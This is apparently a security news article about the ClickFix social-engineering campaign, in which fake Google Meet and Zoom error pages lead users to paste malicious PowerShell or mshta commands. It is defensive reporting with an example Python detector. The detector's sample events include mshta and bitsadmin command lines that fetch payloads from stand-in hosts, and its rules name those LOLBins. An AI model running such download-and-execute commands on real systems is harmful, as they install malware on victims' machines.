Wednesday, December 25, 2024

ClickFix Exploits GMeet & Zoom Pages to Deliver Sophisticated Malware


A new tactic, “ClickFix,” has emerged. It exploits fake Google Meet and Zoom pages to deliver sophisticated malware.

The Sekoia Threat Detection & Research (TDR) team monitors this social engineering strategy closely. It represents a significant evolution in how threat actors deceive users into compromising their systems.

The ClickFix strategy involves displaying deceptive error messages on web browsers, prompting users to execute malicious commands.


These commands, often delivered via PowerShell scripts, ultimately infect users’ systems with malware.


The tactic is particularly concerning because it mimics legitimate video conferencing platforms, such as Google Meet and Zoom, widely used for business and personal communication.

[Figure: ClickFix infection routine (source: Sekoia)]

How ClickFix Works

The infection process initiated by ClickFix is alarmingly straightforward. Users visiting the fake video conferencing pages are instructed to follow a series of seemingly innocuous steps:

  1. Error Message Displayed: A fake error message appears, suggesting a problem with the microphone or headset.
  2. User Action Required: Users are guided to press “Windows + R” to open the Run dialog box.
  3. Malicious Command Execution: Users are instructed to paste and execute a malicious command copied from the page, usually involving PowerShell scripts.

This method tricks users into running commands that download and execute malware, such as the Amos Stealer for macOS or other payloads for Windows systems.

Because the command is launched from the Run dialog, it executes as a child of Explorer.exe, which lends it an appearance of legitimacy and reduces the chance of detection by security software.

[Figure: ClickFix cluster masquerading as a Google Meet page displaying a fake technical issue (source: Sekoia)]

There are several scenarios under which ClickFix can operate:

  • macOS Target: Users are deceived into downloading a .dmg file that executes the malware directly.
  • Windows Target: Two primary infection chains are used. One utilizes a malicious Mshta command, while the other employs PowerShell.

Each scenario exploits the user’s trust in familiar interfaces like Google Meet to initiate the malware delivery process.

Detecting ClickFix requires vigilance and understanding of typical behavioral patterns associated with these attacks. Key indicators include:

  • Process Monitoring: Detecting unusual parent-child process relationships, such as mshta.exe or bitsadmin.exe being initiated by Explorer.exe.
  • Network Activity: Monitoring for suspicious network requests made by processes like mshta.exe, which may use a default User-Agent string typical of Internet Explorer.

Organizations are advised to employ Endpoint Detection and Response (EDR) systems capable of identifying these patterns. Additionally, network logs from firewalls and proxies can provide valuable insights into potential compromises.
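The two indicators above can be turned into simple detection logic. The following Python is an added example (not Sekoia's or GBhackers' code) that flags process-creation events where Explorer.exe spawns mshta.exe or bitsadmin.exe, and proxy log lines whose User-Agent looks like Internet Explorer's; the event format, the log format, the IE User-Agent pattern and all sample data are constructed assumptions.

```python
import re
from typing import Dict, Iterable, List

# LOLBins the article names as children of Explorer.exe in ClickFix chains.
LOLBIN_CHILDREN = {"mshta.exe", "bitsadmin.exe"}
# Assumption (not from the article): IE-style User-Agent tokens, used to spot
# mshta.exe's default web client on a fleet where IE itself is no longer used.
IE_UA_RE = re.compile(r"MSIE \d|Trident/", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the file name of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_process_events(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag events where explorer.exe directly spawns a LOLBin.

    A command typed into the Run dialog runs as a child of explorer.exe,
    which is the parent-child pattern the article describes.
    """
    return [ev for ev in events
            if basename(ev["parent"]) == "explorer.exe"
            and basename(ev["image"]) in LOLBIN_CHILDREN]


def suspicious_proxy_lines(lines: Iterable[str]) -> List[str]:
    """Flag proxy lines whose quoted User-Agent matches an IE-style string.

    Assumed (constructed) line format: ts client method url status "user-agent".
    Tune the pattern on fleets where legacy IE is genuinely still in use.
    """
    hits = []
    for line in lines:
        ua = line.rsplit('"', 2)[-2] if line.count('"') >= 2 else ""
        if IE_UA_RE.search(ua):
            hits.append(line)
    return hits


# Constructed sample telemetry (not real events); hosts use the reserved
# .invalid TLD so they can never resolve.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://lure.example.invalid/fix.hta"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer j https://cdn.example.invalid/a.bin C:\\a.bin"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer j https://cdn.example.invalid/a.bin C:\\a.bin"},
]
SAMPLE_PROXY = [
    '2024-12-25T10:00:01Z 10.0.0.5 GET https://meet.google.com/ 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"',
    '2024-12-25T10:00:09Z 10.0.0.5 GET https://lure.example.invalid/fix.hta 200 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0)"',
]
```

Running the two functions over SAMPLE_EVENTS and SAMPLE_PROXY flags the mshta and bitsadmin children of explorer.exe and the single IE-style proxy request; the bitsadmin launched from cmd.exe is deliberately not matched, so that case needs a separate rule.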

A significant aspect of ClickFix’s success lies in its use of legitimate Windows tools, a strategy known as “living off the land.”

By exploiting tools like bitsadmin.exe, attackers can bypass traditional security measures. This method emphasizes the need for organizations to maintain robust monitoring systems that can discern legitimate use from malicious activity.

The emergence of ClickFix highlights the evolving nature of cyber threats and the sophistication of social engineering tactics.

As threat actors continue to exploit trusted platforms like Google Meet and Zoom, users and organizations must remain vigilant.

Understanding the mechanics of these attacks and implementing comprehensive detection strategies can mitigate the risks posed by ClickFix and similar threats.


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
